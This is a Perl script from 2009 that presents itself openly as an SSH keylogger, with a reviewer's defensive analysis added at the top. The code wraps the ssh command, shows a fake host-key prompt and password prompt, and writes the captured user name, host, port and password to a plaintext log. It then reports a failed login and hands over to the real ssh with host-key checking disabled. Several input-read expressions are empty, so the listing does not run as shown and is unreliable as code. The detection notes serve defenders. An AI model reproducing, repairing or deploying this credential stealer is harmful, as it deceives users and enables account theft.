#!/usr/bin/perl
##############################################################.
#                   (UNSECURE)SH Logg3r                      #
#                                                            #
#                An SSH Seamless Keylogger                   #
#            Use with a bogus acct and "alias"               #
#  or on a rooted system, will generate a "Login Incorrect"  #
#  making the user think he/she misstyped their passwd.      #
#                                                            #
#  Try to keep without too many deps/perl modules - so far   #
#  just IO::Socket::INET --->                                #
#  If you root a Debian box do:                              #
#     apt-get install libio-socket-ssl-perl                  #
#  Or simply use CPAN if you think you have enough time:     #
#     cpan install IO::Socket::INET                          #
#                                                            #
#                                                            #
#                                                            #
#  Coded by Trevelyn - Douglas at WeakNetLabs dot com        #
#  2009 WeakNet Labs                                         #
#                                                            #
##############################################################'
#
# NOTE(review): analysis summary for defenders.
#
# What the listing does, as far as the visible code shows:
#   * Stands in for the `ssh` command (the banner says it is installed via a
#     shell alias) and prints ssh's usage text when called without arguments.
#   * Pulls a user name (-l), a port (-p) and any argument containing a dot
#     (treated as the host) out of @ARGV; every other option is ignored.
#   * Appends user, host, port and the typed password, in plaintext, to a
#     hard-coded log file.
#   * Prints "Permission denied, please try again." and then starts the real
#     ssh with StrictHostKeyChecking=no, so the victim's second password
#     attempt goes to the genuine client.
#
# Artefacts a responder can look for, all taken from this listing:
#   * `ssh` resolving to an alias, function or script instead of the OpenSSH
#     binary (`type -a ssh`, and alias lines in shell start-up files).
#   * The constant fingerprint string
#     c7:32:94:4e:3a:1d:b0:73:98:d7:46:f3:27:f4:d8:7e in a file or in
#     terminal scrollback; a real client prints the server's own key.
#   * A perl process that runs `stty -echo`, `stty echo` and then
#     `ssh -o 'StrictHostKeyChecking=no' ...` through system().
#   * An append-mode file containing "User:", "Host:", "Port:" and
#     "Password:" lines between ".=####...####=." separators.
#   * A TCP connection to the target port on which this script sends
#     nothing, opened just before the real ssh connection.
#   * known_hosts entries the user never confirmed: with
#     StrictHostKeyChecking=no, OpenSSH adds unknown host keys silently.
#
# Mitigation: public-key or hardware-backed authentication leaves no
# password for a wrapper like this to capture; integrity monitoring of
# shell start-up files and of PATH directories exposes the alias.
#
# NOTE(review): three input-read expressions are empty in this capture
# (marked below), so the listing does not compile as shown.

use IO::Socket::INET;

# Arguments:
@ARGV;

# If no arguments: behave like ssh and print its usage text.
if (@ARGV[0] eq '') {&error;}

# error: print a copy of the OpenSSH client usage message and exit, so an
# invocation without a usable host looks like the real client.
sub error {
    print "usage: ssh [-1246AaCfgKkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n"
    ," [-D [bind_address:]port] [-e escape_char] [-F configfile]\n"
    ," [-i identity_file] [-L [bind_address:]port:host:hostport]\n"
    ," [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]\n"
    ," [-R [bind_address:]port:host:hostport] [-S ctl_path]\n"
    ," [-w local_tun[:remote_tun]] [user@]hostname [command]\n";
    exit;
}

# Open up logger file (append mode, hard-coded path, result not checked).
# Credentials captured below are written here in plaintext.
open (LOG, ">>/hacktools/keyloggers/ssh_mitm/payload-ssh.txt");
print LOG "\n.=####################################=.\n";

# Search arguments for a user name if specified with "-l".
# $u stops at the first argument matching /-l/, or one past the end of @ARGV.
$u = 0;
++$u until $ARGV[$u] =~ /-l/ || $u > $#ARGV;
$user = ($u + 1);   # index of the argument that follows "-l"

# Log the User: (First See if a Username was specified):
# With no "-l" the index is past the end of @ARGV, so the current login
# name from getlogin() is recorded instead.
if (@ARGV[$user] eq "") { $userf = getlogin(); }
else { $userf = @ARGV[$user]; }
print LOG "User: $userf\n";

# Get the HOSTNAME for the SSH Server: every argument containing a dot.
@host = grep(/\./, @ARGV);

# Log the IP/HOSTNAME:
print LOG "Host: @host\n";

# If no host: fall back to the usage message.
if (@host[0] eq "") { &error; }

# Get a port number if specified (same scan as for "-l", looking for "-p"):
$v = 0;
++$v until $ARGV[$v] =~ /-p/ || $v > $#ARGV;
if ($ARGV[$v] =~ /-p/) { $pnum = ($v + 1); $port = @ARGV[$pnum];}
# Or it's just port 22:
else { $port = 22; }

# Log port number:
print LOG "Port: $port\n";

# See if you have connected before: the host name, with its dots escaped,
# is matched against lines of a hard-coded known_hosts file. On a match
# control goes to checkport, which does not return (every path below ends
# in exit), so the host-key prompt is skipped for hosts already known.
open (RSAF, '/home/assistant/.ssh/known_hosts');
$check0 = @host[0];
$check0 =~ s/\./\\./g;
# NOTE(review): the loop condition is empty in this capture.
while () { $lines = $_; chomp $lines; close ($RSAF); if ($lines =~ m/$check0/) { &checkport; }}

# Issue false RSA warning: the fingerprint is a constant in the script,
# not the server's key, which makes the string usable as a signature.
print "The authenticity of host \'[@host[0]]:@ARGV[$port] ([@host[0]]:@ARGV[$port])\' can\'t be established."
,"\nRSA key fingerprint is c7:32:94:4e:3a:1d:b0:73:98:d7:46:f3:27:f4:d8:7e."
,"\nAre you sure you want to continue connecting (yes/no)? ";
# NOTE(review): the right-hand side is empty in this capture. $ans is not
# consulted anywhere later in the listing.
$ans = ;&checkport;

# See if you are trying the right port :P
# checkport: open a TCP connection to the chosen host and port. Nothing is
# sent on the socket. A failed connect goes to portdown; otherwise the
# password prompt follows.
sub checkport {
    $hostf = @host[0];
    $sock = IO::Socket::INET->new(PeerAddr => $hostf, PeerPort => $port, Proto => 'tcp') || &portdown;
    &continue0;
}

# portdown: print an ssh-style "Connection refused" line and exit.
sub portdown {
    $host = @host[0];
    print "ssh: connect to host $host port $port: Connection refused\n";
    exit;
}

# continue0: show an ssh-style password prompt with terminal echo turned
# off, write what was typed to the log, then hand over to finished.
sub continue0 {
    # Ask for password like SSH does:
    print "$userf\@@host\'s password: ";
    system("stty -echo");   # child process visible in process accounting
    # NOTE(review): the right-hand side is empty in this capture.
    $passwd = ;
    chomp $passwd;
    system("stty echo");
    # Log passwd: stored in plaintext next to user, host and port.
    print LOG "Password: $passwd\n";
    # Save File:
    close ($LOG);
    &finished;
}

# finished: report a failed login, then start the real ssh client so the
# user's retry reaches the genuine server.
sub finished {
    print "\nPermission denied, please try again.\n";
    # Now really use SSH, and ignore the Key Error:
    # Only host, port and user are passed on; the values come from @ARGV
    # and are interpolated into a single command string given to system().
    system "ssh -o 'StrictHostKeyChecking=no' @host[0] -p $port -l $userf";
    exit;
}